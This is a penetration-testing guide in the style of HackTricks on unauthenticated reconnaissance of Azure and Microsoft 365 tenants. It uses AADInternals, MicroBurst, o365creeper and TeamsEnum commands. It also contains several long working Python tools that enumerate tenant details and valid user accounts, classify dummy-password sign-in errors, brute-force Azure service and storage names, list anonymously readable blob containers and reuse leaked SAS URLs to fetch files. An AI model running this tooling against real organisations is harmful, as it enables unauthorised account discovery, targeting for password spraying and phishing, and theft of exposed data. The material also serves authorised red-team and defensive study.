Az - Unauthenticated Enum & Initial Entry
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Azure Tenant
Tenant Enumeration
There are several public Azure endpoints that an attacker can query, knowing only the target's domain, to gather information about the tenant.
You can query the API directly or use the PowerShell library AADInternals:
| API | Information | AADInternals function |
|---|---|---|
| login.microsoftonline.com/<domain>/.well-known/openid-configuration | Login information, including tenant ID | Get-AADIntTenantID -Domain <domain> |
| autodiscover-s.outlook.com/autodiscover/autodiscover.svc | All domains of the tenant | Get-AADIntTenantDomains -Domain <domain> |
| login.microsoftonline.com/GetUserRealm.srf?login=<UserName> | Login information of the tenant, including tenant name and domain authentication type (Managed/Federated) | Get-AADIntLoginInformation -UserName <UserName> |
| login.microsoftonline.com/common/GetCredentialType | Login information, including Desktop SSO information | Get-AADIntLoginInformation -UserName <UserName> |
You can query all the information of an Azure tenant with just one command of the AADInternals library:
Invoke-AADIntReconAsOutsider -DomainName corp.onmicrosoft.com | Format-Table
Output Example of the Azure tenant info:
Tenant brand: Company Ltd
Tenant name: company
Tenant id: 1937e3ab-38de-a735-a830-3075ea7e5b39
DesktopSSO enabled: True
Name DNS MX SPF Type STS
---- --- -- --- ---- ---
company.com True True True Federated sts.company.com
company.mail.onmicrosoft.com True True True Managed
company.onmicrosoft.com True True True Managed
int.company.com False False False Managed
The output shows the tenant's name, ID and brand name, as well as whether Desktop Single Sign-On (Seamless SSO) is enabled. When it is enabled, the autologon endpoint it relies on can be used to check whether a given user exists in the target organization (see the Autologon method under User Enumeration below).
The output also lists all verified domains of the target tenant together with their identity type. For federated domains, the FQDN of the identity provider in use (typically an ADFS server) is disclosed as well. The "MX" column states whether email is routed to Exchange Online, and the "SPF" column whether Exchange Online is listed as an allowed sender. Note that the recon function does not follow "include" statements in SPF records, so the SPF column can produce false negatives.
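The following Python script is an added example (not part of this page and not AADInternals code) that shows what the three login endpoints in the table return and how to extract the same facts from them: the tenant GUID from the openid-configuration document, the domain type and federation STS from GetUserRealm.srf, and the Desktop SSO flag from GetCredentialType. The sample responses are constructed to mirror the shape of the real responses; the tenant ID is the one from the output above and every other value is made up. The fetch() helper is only needed for a live run against login.microsoftonline.com.

```python
import json
import re
import urllib.parse
import urllib.request
from typing import Optional

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)


def recon_urls(domain: str, username: Optional[str] = None) -> dict:
    """The public endpoints from the table above for one target domain."""
    user = username or f"user@{domain}"
    return {
        "openid": f"https://login.microsoftonline.com/{domain}/.well-known/openid-configuration",
        "userrealm": f"https://login.microsoftonline.com/GetUserRealm.srf?login={urllib.parse.quote(user)}",
        # GetCredentialType is a POST; the JSON body is {"Username": "<user>"}
        "credtype": "https://login.microsoftonline.com/common/GetCredentialType",
    }


def fetch(url: str, json_body: Optional[dict] = None) -> str:
    """GET, or POST JSON when a body is given. Only used for live recon."""
    data = json.dumps(json_body).encode() if json_body is not None else None
    req = urllib.request.Request(url, data=data, headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return resp.read().decode()


def tenant_id_from_openid(body: str) -> Optional[str]:
    """A known domain embeds the tenant GUID in its endpoints; an unknown one returns an error document."""
    cfg = json.loads(body)
    for key in ("token_endpoint", "authorization_endpoint", "issuer"):
        m = GUID_RE.search(cfg.get(key, ""))
        if m:
            return m.group(0).lower()
    return None


def realm_info(body: str) -> dict:
    """Classify a domain from GetUserRealm.srf: Managed (cloud auth), Federated (ADFS/other IdP) or Unknown."""
    realm = json.loads(body)
    info = {
        "domain": realm.get("DomainName"),
        "type": realm.get("NameSpaceType", "Unknown"),
        "brand": realm.get("FederationBrandName"),
        "sts": None,
    }
    if info["type"] == "Federated":
        # AuthURL is where users are redirected to authenticate, i.e. the federation server
        info["sts"] = urllib.parse.urlsplit(realm.get("AuthURL", "")).hostname
    return info


def desktop_sso_enabled(body: str) -> bool:
    """Seamless SSO flag from a GetCredentialType response."""
    return bool(json.loads(body).get("EstsProperties", {}).get("DesktopSsoEnabled", False))


def recon_as_outsider(domain: str, openid_body: str, realm_body: str, credtype_body: str) -> dict:
    """Offline counterpart of Invoke-AADIntReconAsOutsider over already-fetched responses."""
    realm = realm_info(realm_body)
    return {
        "domain": domain,
        "tenant_id": tenant_id_from_openid(openid_body),
        "tenant_brand": realm["brand"],
        "domain_type": realm["type"],
        "sts": realm["sts"],
        "desktop_sso": desktop_sso_enabled(credtype_body),
    }


# Constructed sample responses: real shapes, made-up values (tenant ID taken from the page output)
SAMPLE_OPENID = json.dumps({
    "token_endpoint": "https://login.microsoftonline.com/1937e3ab-38de-a735-a830-3075ea7e5b39/oauth2/token",
    "issuer": "https://sts.windows.net/1937e3ab-38de-a735-a830-3075ea7e5b39/",
})
SAMPLE_REALM_FEDERATED = json.dumps({
    "State": 3, "UserState": 2, "Login": "user@company.com", "NameSpaceType": "Federated",
    "DomainName": "company.com", "FederationBrandName": "Company Ltd",
    "AuthURL": "https://sts.company.com/adfs/ls/?username=user%40company.com&wa=wsignin1.0",
})
SAMPLE_REALM_MANAGED = json.dumps({
    "State": 4, "UserState": 1, "Login": "user@company.onmicrosoft.com", "NameSpaceType": "Managed",
    "DomainName": "company.onmicrosoft.com", "FederationBrandName": "Company Ltd",
})
SAMPLE_CREDTYPE = json.dumps({
    "Username": "user@company.com", "IfExistsResult": 0, "ThrottleStatus": 0,
    "EstsProperties": {"DomainType": 3, "DesktopSsoEnabled": True},
})

if __name__ == "__main__":
    print(recon_as_outsider("company.com", SAMPLE_OPENID, SAMPLE_REALM_FEDERATED, SAMPLE_CREDTYPE))
```

For a live run, feed fetch(recon_urls(d)["openid"]), fetch(recon_urls(d)["userrealm"]) and fetch(recon_urls(d)["credtype"], {"Username": ...}) into recon_as_outsider(); none of these calls require credentials.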
User Enumeration
It's possible to check whether a username exists inside a tenant. This also includes guest users, whose username has the format:
<email>#EXT#@<tenant name>.onmicrosoft.com
where the email is the guest's email address with the "@" replaced by an underscore "_".
With AADInternals, you can easily check if the user exists or not:
# Check whether the user exists
Invoke-AADIntUserEnumerationAsOutsider -UserName "user@company.com"
Output:
UserName Exists
-------- ------
user@company.com True
You can also use a text file containing one email address per line:
user@company.com
user2@company.com
admin@company.com
admin2@company.com
external.user_gmail.com#EXT#@company.onmicrosoft.com
external.user_outlook.com#EXT#@company.onmicrosoft.com
# Invoke user enumeration
Get-Content .\users.txt | Invoke-AADIntUserEnumerationAsOutsider -Method Normal
There are three different enumeration methods to choose from:
| Method | Description |
|---|---|
| Normal | Uses the GetCredentialType API mentioned above. The default method. |
| Login | Tries to log in as the user (with a dummy password) and inspects the error returned. |
| Autologon | Tries to log in as the user via the autologon endpoint used by Seamless SSO. |
Normal is the quietest option. Login and Autologon submit real authentication attempts, so they are noisier and the failed attempts can count towards the account's lockout threshold.
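The Python below is an added example (not from this page or from AADInternals) of the decision logic behind the three methods: building the guest UPN format shown above, reading IfExistsResult and ThrottleStatus from a GetCredentialType response (the Normal method), and mapping the AADSTS error code of a dummy-password sign-in (the Login and Autologon methods) to a verdict. All responses are constructed samples; the code-to-verdict mapping is the commonly used one for these endpoints, and the WS-Trust request body for the autologon endpoint is not built here, only its URL and the response handling.

```python
import json
import re
import uuid
from typing import Callable, Dict, Iterable, Tuple

# GetCredentialType -> IfExistsResult (Normal method). Check ThrottleStatus before trusting it.
IFEXISTS = {0: "exists", 1: "not found", 5: "different identity provider", 6: "exists"}

# AADSTS codes returned by a sign-in attempt with a dummy password (Login / Autologon methods)
AADSTS = {
    "50034": "not found",
    "50059": "tenant not found",
    "50126": "exists (wrong password)",
    "50053": "exists (account locked)",
    "50055": "exists (password expired)",
    "50056": "exists (no password set)",
    "50057": "exists (account disabled)",
    "50076": "exists (password correct, MFA required)",
    "50079": "exists (password correct, MFA enrolment required)",
    "53003": "exists (blocked by Conditional Access)",
}
AADSTS_RE = re.compile(r"AADSTS(\d{5})")


def guest_upn(email: str, tenant: str) -> str:
    """Guest (B2B) UPN: local@domain becomes local_domain#EXT#@<tenant>.onmicrosoft.com."""
    tenant = tenant.split(".")[0]  # accept "company" or "company.onmicrosoft.com"
    return f"{email.replace('@', '_')}#EXT#@{tenant}.onmicrosoft.com"


def credtype_request(username: str) -> Tuple[str, dict]:
    """URL and JSON body for the Normal method (POST)."""
    return "https://login.microsoftonline.com/common/GetCredentialType", {"Username": username}


def classify_credtype(body: str) -> str:
    """Verdict from a GetCredentialType response."""
    r = json.loads(body)
    if r.get("ThrottleStatus") == 1:
        return "throttled"  # no conclusion possible, back off and retry later
    code = r.get("IfExistsResult")
    return IFEXISTS.get(code, f"unknown ({code})")


def autologon_url(domain: str) -> str:
    """Endpoint used by the Autologon method (a WS-Trust 2005 UsernameToken request is POSTed here)."""
    return (f"https://autologon.microsoftonline.com/{domain}/winauth/trust/2005/usernamemixed"
            f"?client-request-id={uuid.uuid4()}")


def classify_signin(body: str) -> str:
    """Verdict from a Login/Autologon response body via its AADSTS code."""
    m = AADSTS_RE.search(body)
    if m is None:
        # No error at all means the dummy password was accepted: the credentials are valid
        return "exists (valid credentials)" if "RequestSecurityTokenResponse" in body else "unknown"
    return AADSTS.get(m.group(1), f"unknown (AADSTS{m.group(1)})")


def enumerate_users(usernames: Iterable[str], probe: Callable[[str], str],
                    classify: Callable[[str], str]) -> Dict[str, str]:
    """Counterpart of Get-Content users.txt | Invoke-AADIntUserEnumerationAsOutsider with a pluggable probe."""
    return {u.strip(): classify(probe(u.strip())) for u in usernames if u.strip()}


# Constructed sample responses (real shapes, made-up values)
SAMPLE_CREDTYPE = {
    "user@company.com": json.dumps({"Username": "user@company.com", "IfExistsResult": 0, "ThrottleStatus": 0}),
    "nobody@company.com": json.dumps({"Username": "nobody@company.com", "IfExistsResult": 1, "ThrottleStatus": 0}),
    "user9@company.com": json.dumps({"Username": "user9@company.com", "IfExistsResult": 0, "ThrottleStatus": 1}),
}
SAMPLE_AUTOLOGON_WRONG_PW = (
    '<S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope"><S:Body><S:Fault><S:Reason>'
    '<S:Text xml:lang="en-US">AADSTS50126: Error validating credentials due to invalid username or password.'
    '</S:Text></S:Reason></S:Fault></S:Body></S:Envelope>'
)
SAMPLE_AUTOLOGON_NO_USER = (
    '<S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope"><S:Body><S:Fault><S:Reason>'
    '<S:Text xml:lang="en-US">AADSTS50034: The user account does not exist in the company.com directory.'
    '</S:Text></S:Reason></S:Fault></S:Body></S:Envelope>'
)

if __name__ == "__main__":
    print(guest_upn("external.user@gmail.com", "company"))
    print(enumerate_users(SAMPLE_CREDTYPE, SAMPLE_CREDTYPE.__getitem__, classify_credtype))
    print(classify_signin(SAMPLE_AUTOLOGON_WRONG_PW), classify_signin(SAMPLE_AUTOLOGON_NO_USER))
```

The probe passed to enumerate_users() is whatever sends the request (an HTTP POST for Normal, a WS-Trust POST for Autologon); keeping it separate from the classification makes the "throttled" and "unknown" outcomes explicit instead of silently counting them as non-existent users.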
After discovering the valid usernames you can get info about a user with:
Get-AADIntLoginInformation -UserName root@corp.onmicrosoft.com
The script o365creeper also lets you check whether an email address is valid.
# emails.txt contains one address per line, e.g.:
# - root@corp.onmicrosoft.com
python.exe .\o365creeper\o365creeper.py -f .\emails.txt -o validemails.txt
User Enumeration via Microsoft Teams
Another good source of information is Microsoft Teams.
The Microsoft Teams API allows searching for users. In particular, the "user search" endpoints externalsearchv3 and searchUsers can be used to request general information about Teams-enrolled user accounts.
Depending on the API response it is possible to distinguish non-existing users from existing users that have a valid Teams subscription.
The script TeamsEnum can be used to validate a given set of usernames against the Teams API. It authenticates with a Teams-licensed account you control (in any tenant); no access to the target tenant is needed.
python3 TeamsEnum.py -a password -u <username> -f inputlist.txt -o teamsenum-output.json
Output:
[-] user1@domain - Target user not found. Either the user does not exist, is not Teams-enrolled or is configured to not appear in search results (personal accounts only)
[+] user2@domain - User2 | Company (Away, Mobile)
[+] user3@domain - User3 | Company (Available, Desktop)
Furthermore it is possible to enumerate availability information about existing users like the following:
- Available
- Away
- DoNotDisturb
- Busy
- Offline
If an out-of-office message is configured, it's also possible to retrieve the message using TeamsEnum. If an output file was specified, the out-of-office messages are automatically stored within the JSON file:
jq . teamsenum-output.json
Output:
{
"email": "user2@domain",
"exists": true,
"info": [
{
"tenantId": "[REDACTED]",
"isShortProfile": false,
"accountEnabled": true,
"featureSettings": {
"coExistenceMode": "TeamsOnly"
},
"userPrincipalName": "user2@domain",
"givenName": "user2@domain",
"surname": "",
"email": "user2@domain",
"tenantName": "Company",
"displayName": "User2",
"type": "Federated",
"mri": "8:orgid:[REDACTED]",
"objectId": "[REDACTED]"
}
],
"presence": [
{
"mri": "8:orgid:[REDACTED]",
"presence": {
"sourceNetwork": "Federated",
"calendarData": {
"outOfOfficeNote": {
"message": "Dear sender. I am out of the office until March 23rd with limited access to my email. I will respond after my return.Kind regards, User2",
"publishTime": "2023-03-15T21:44:42.0649385Z",
"expiry": "2023-04-05T14:00:00Z"
},
"isOutOfOffice": true
},
"capabilities": ["Audio", "Video"],
"availability": "Away",
"activity": "Away",
"deviceType": "Mobile"
},
"etagMatch": false,
"etag": "[REDACTED]",
"status": 20000
}
]
}
Azure Services
Now that we know the domains the Azure tenant is using, it is time to try to find exposed Azure services.
You can use a function from MicroBurst for this. It searches for the base name (and a few permutations of it) across several Azure service domains, such as blob.core.windows.net, azurewebsites.net, database.windows.net and vault.azure.net, and reports the hostnames that resolve:
Import-Module .\MicroBurst\MicroBurst.psm1 -Verbose
Invoke-EnumerateAzureSubDomains -Base corp -Verbose
Open Storage
You can discover open storage with Invoke-EnumerateAzureBlobs (Invoke-EnumerateAzureBlobs.ps1), which uses the wordlist Microburst/Misc/permutations.txt to generate (very simple) permutations of the base name and checks whether the resulting storage accounts and containers allow anonymous listing.
Import-Module .\MicroBurst\MicroBurst.psm1
Invoke-EnumerateAzureBlobs -Base corp
[...]
https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
[...]
# Access https://corpcommon.blob.core.windows.net/secrets?restype=container&comp=list
# Check: <Name>ssh_info.json</Name>
# Access then https://corpcommon.blob.core.windows.net/secrets/ssh_info.json
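The Python below is an added example (not from this page and not MicroBurst code) of what the two MicroBurst functions above do under the hood: generate name permutations, check which <name>.<service suffix> hostnames resolve in DNS, and for storage accounts request an anonymous container listing (?restype=container&comp=list) and parse the XML it returns. The suffix and permutation lists are a representative subset of MicroBurst's, not a copy; the DNS resolver and HTTP fetcher are injectable so the block can be exercised offline against the constructed listing at the bottom.

```python
import re
import socket
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Iterable, List, Tuple

# Service suffixes probed (subset of what MicroBurst checks); existence is decided by DNS resolution
AZURE_SUFFIXES = {
    "blob.core.windows.net": "Storage (blob)",
    "file.core.windows.net": "Storage (file)",
    "queue.core.windows.net": "Storage (queue)",
    "table.core.windows.net": "Storage (table)",
    "azurewebsites.net": "App Service",
    "scm.azurewebsites.net": "App Service (Kudu/SCM)",
    "database.windows.net": "SQL Database",
    "documents.azure.com": "Cosmos DB",
    "vault.azure.net": "Key Vault",
    "azurecr.io": "Container Registry",
    "servicebus.windows.net": "Service Bus",
    "redis.cache.windows.net": "Redis Cache",
    "azure-api.net": "API Management",
    "onmicrosoft.com": "Microsoft 365 tenant",
    "sharepoint.com": "SharePoint",
}
PERMUTATIONS = ["", "dev", "test", "prod", "staging", "backup", "common", "data", "files", "secrets"]
# Storage account names are 3-24 lowercase letters/digits; anything else cannot exist, so skip it
STORAGE_NAME_RE = re.compile(r"^[a-z0-9]{3,24}$")


def candidates(base: str, permutations: Iterable[str] = PERMUTATIONS) -> List[str]:
    """base, basedev, devbase, base-dev, dev-base ... (simple, in the spirit of permutations.txt)."""
    base = base.lower()
    names = {base}
    for p in permutations:
        if p:
            names.update({f"{base}{p}", f"{p}{base}", f"{base}-{p}", f"{p}-{base}"})
    return sorted(names)


def dns_resolves(host: str) -> bool:
    try:
        socket.gethostbyname(host)
        return True
    except socket.gaierror:
        return False


def enumerate_subdomains(base: str, resolver: Callable[[str], bool] = dns_resolves) -> List[Tuple[str, str]]:
    """Invoke-EnumerateAzureSubDomains counterpart: (hostname, service) for every name that resolves."""
    hits = []
    for name in candidates(base):
        for suffix, service in AZURE_SUFFIXES.items():
            if suffix.endswith("core.windows.net") and not STORAGE_NAME_RE.match(name):
                continue
            host = f"{name}.{suffix}"
            if resolver(host):
                hits.append((host, service))
    return hits


def container_list_url(account: str, container: str) -> str:
    return f"https://{account}.blob.core.windows.net/{container}?restype=container&comp=list"


def http_get(url: str) -> Tuple[int, str]:
    """Status and body; a private container answers an anonymous listing with 403/404."""
    try:
        with urllib.request.urlopen(url, timeout=10) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, ""


def parse_blob_listing(body: str) -> List[str]:
    """Blob names from the EnumerationResults XML returned by ?restype=container&comp=list."""
    return [b.findtext("Name") for b in ET.fromstring(body.encode()).iter("Blob")]


def find_open_containers(account: str, containers: Iterable[str],
                         fetch: Callable[[str], Tuple[int, str]] = http_get) -> Dict[str, List[str]]:
    """Invoke-EnumerateAzureBlobs counterpart for one storage account: container -> listed blob names."""
    found: Dict[str, List[str]] = {}
    for c in containers:
        status, body = fetch(container_list_url(account, c))
        if status == 200 and "<EnumerationResults" in body:
            found[c] = parse_blob_listing(body)
    return found


# Constructed sample listing, shaped like the real response for the page's corpcommon/secrets example
SAMPLE_LISTING = """<?xml version="1.0" encoding="utf-8"?>
<EnumerationResults ServiceEndpoint="https://corpcommon.blob.core.windows.net/" ContainerName="secrets">
<Blobs><Blob><Name>ssh_info.json</Name><Properties><Content-Length>412</Content-Length></Properties></Blob>
<Blob><Name>backup/db.bak</Name><Properties><Content-Length>9</Content-Length></Properties></Blob></Blobs>
<NextMarker /></EnumerationResults>"""

if __name__ == "__main__":
    print(enumerate_subdomains("corp"))
    print(find_open_containers("corpcommon", ["secrets", "backup", "public"]))
```

A real run iterates the container wordlist over every storage account that resolved; a 200 with an EnumerationResults body means the container's public access level permits anonymous listing, and each listed name can then be downloaded from https://<account>.blob.core.windows.net/<container>/<name>.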
SAS URLs
A shared access signature (SAS) URL grants access to part of a storage account (a whole container, a single blob, ...) with specific permissions (read, write, list, ...) for a limited time. If you find a leaked one you may be able to access sensitive information. A container-scoped SAS looks like this (a blob-scoped one also carries the blob path in the URL):
https://<storage_account_name>.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D
The query parameters tell you what the token grants: sp is the permission set (here r, read only: blobs can be downloaded if you know their names, but listing the container would require l), sr=c means the signed resource is a container (b would be a single blob), st/se are the validity window and sig is the signature over these fields, so none of them can be altered. Use Storage Explorer to access the data.
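Before opening a leaked SAS URL in Storage Explorer it is worth decoding it. The Python below is an added example (not from this page) that parses the query string of a service SAS into permissions, resource type and validity window, and shows how to reuse a container SAS for one blob whose name you know. The sample URL is the one above with the placeholder account name replaced by corpcommon (a constructed value).

```python
from datetime import datetime, timezone
from typing import Optional
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Service SAS permission letters (sp) and signed resource types (sr)
PERMISSIONS = {"r": "read", "a": "add", "c": "create", "w": "write", "d": "delete", "x": "delete version",
               "y": "permanent delete", "l": "list", "t": "tag", "f": "filter", "m": "move", "e": "execute",
               "i": "set immutability", "p": "process", "u": "update"}
RESOURCES = {"b": "blob", "bv": "blob version", "bs": "blob snapshot", "c": "container", "d": "directory",
             "f": "file", "s": "share"}


def _ts(value: Optional[str]) -> Optional[datetime]:
    """SAS times are UTC, either full ISO 8601 ending in Z or date-only."""
    if not value:
        return None
    fmt = "%Y-%m-%dT%H:%M:%SZ" if "T" in value else "%Y-%m-%d"
    return datetime.strptime(value, fmt).replace(tzinfo=timezone.utc)


def parse_sas(url: str, now: Optional[datetime] = None) -> dict:
    """What a leaked SAS URL grants, on which resource, and whether it is usable right now."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    now = now or datetime.now(timezone.utc)
    start, expiry = _ts(q.get("st")), _ts(q.get("se"))
    path = parts.path.strip("/").split("/", 1)
    perms = q.get("sp", "")
    return {
        "account": parts.hostname.split(".")[0],
        "container": path[0],
        "blob": path[1] if len(path) > 1 else None,
        # an account SAS carries ss/srt instead of sr
        "resource": RESOURCES.get(q.get("sr", ""), "account SAS" if "ss" in q else "unknown"),
        "permissions": [PERMISSIONS.get(c, c) for c in perms],
        "can_list": "l" in perms,  # without l you must already know blob names
        "https_only": q.get("spr") == "https",
        "start": start,
        "expiry": expiry,
        "valid_now": (start is None or start <= now) and (expiry is None or now < expiry),
        "signed": bool(q.get("sig")),
    }


def blob_url_with_sas(sas_url: str, blob_name: str) -> str:
    """Reuse a container SAS for one blob: append the name, keep the signed query string untouched."""
    parts = urlsplit(sas_url)
    return urlunsplit((parts.scheme, parts.netloc, parts.path.rstrip("/") + "/" + blob_name, parts.query, ""))


# Constructed sample: the page's URL with corpcommon as the account name
SAMPLE_SAS = ("https://corpcommon.blob.core.windows.net/newcontainer?sp=r&st=2021-09-26T18:15:21Z"
              "&se=2021-10-27T02:14:21Z&spr=https&sv=2021-07-08&sr=c"
              "&sig=7S%2BZySOgy4aA3Dk0V1cJyTSIf1cW%2Fu3WFkhHV32%2B4PE%3D")

if __name__ == "__main__":
    print(parse_sas(SAMPLE_SAS))
    print(blob_url_with_sas(SAMPLE_SAS, "ssh_info.json"))
```

For the sample, the decoded token is read-only on the container newcontainer, cannot list it, and expired on 2021-10-27; a still-valid one with the same permissions would let you fetch blob_url_with_sas(url, name) for any name you learned elsewhere (for example from an anonymous listing, source code or logs).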
Compromise Credentials
Phishing
- Common Phishing (credentials or OAuth App -Illicit Consent Grant Attack-)
- Device Code Authentication Phishing
Password Spraying / Brute-Force
References
- https://aadinternals.com/post/just-looking/
- https://www.securesystems.de/blog/a-fresh-look-at-user-enumeration-in-microsoft-teams/